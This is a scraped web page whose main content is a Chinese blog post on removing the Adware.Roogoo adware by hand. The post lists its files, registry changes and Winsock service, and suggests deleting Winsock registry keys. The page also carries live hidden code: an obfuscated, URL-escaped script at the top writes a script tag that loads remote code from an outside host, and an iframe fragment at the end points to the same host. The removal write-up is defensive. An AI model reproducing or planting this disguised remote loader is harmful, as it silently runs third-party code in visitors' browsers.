HTML Tags and JavaScript tutorial
<script language="javascript">var encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
Adware.Roogoo恶意广告程序的手动清除
前几天,因为误下载了一个广告程序安装包,运行之后,几乎所有的垃圾插件都被强制安装。经过10分钟左右的手工清理(不太信任杀毒软件,也不安装杀毒软件),基本清除完毕。只剩下一个quartz32.dll 被大多数进程包括系统进程使用,在中止了了大量的进程的情况下,这个文件也被删除了,还包括msplus.dll这样的文件。由此噩梦出现了,当我重新启动计算机,发现再也无法与网络连接,也不能访问任何网站
用另外一台机器查询,得知是Adware.Roogoo的恶意广告程序。这个程序的安装之后,会增加一个驱动,接管系统对winsock的API调用,并监视网络的流量。我把部分文件删除之后,系统地winsock调用却没有恢复,所以系统中凡是引用了winsock API的系统服务和应用程序doujiang仔细查了一下该程序的行为特征如下
1.创建以下文件
%System%/msplus.dll
%System%/msplus1.dll
%System%/msplus2.dll
%System%/msplus3.dll
%System%/msplus4.dll
2.创建以下注册表的子项
HKEY_CLASSES_ROOT/CLSID/{18F57D30-EF36-4C0E-9343-7BFA6DF79B4A}
HKEY_CLASSES_ROOT/Interface/{2805A558-1E98-48FB-8BA5-49A3AD78B129}
HKEY_CLASSES_ROOT/TypeLib/{57F7A59D-8F7F-41B2-98B8-A095456716E9}
HKEY_CLASSES_ROOT/Adplus.XLink
HKEY_CLASSES_ROOT/Adplus.XLink.1
HKEY_LOCAL_MACHINE/SOFTWARE/Roogoo
3.添加以下的Value
"FROMID" = "roogoo"
到注册表的子项下
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion
4.修改子键
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/3
的Value为如下
"2102" = "0"
并且移除IE对弹出窗口的限制
5.创建具有以下特征的合法系统服务
Service Name:
WS2IFSL
Display Name:
Windows Socket 2.0 Non-IFS Service Provider Support Environment
Path to executable:
%System%/System32/drivers/ws2ifsl.sys
Startup type:
System
6.安装一个LSP 来监视来自有威胁的计算机的网络流量,并且向GOOGLE搜索以下的域
roogoo.com
7.弹出显示广告对话框
清除方法,除了要删除添加的文件,同时还要删除在注册表添加和修改的项目,并且删除相应的服务。
为了修复上网。
还必须要删除以下键
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Winsock
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Winsock2
然后从新安装TCP/IP就可以了
详细的清理方法,下回再写吧,为了这个广告程序,我重新安装过2次计算机了
src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">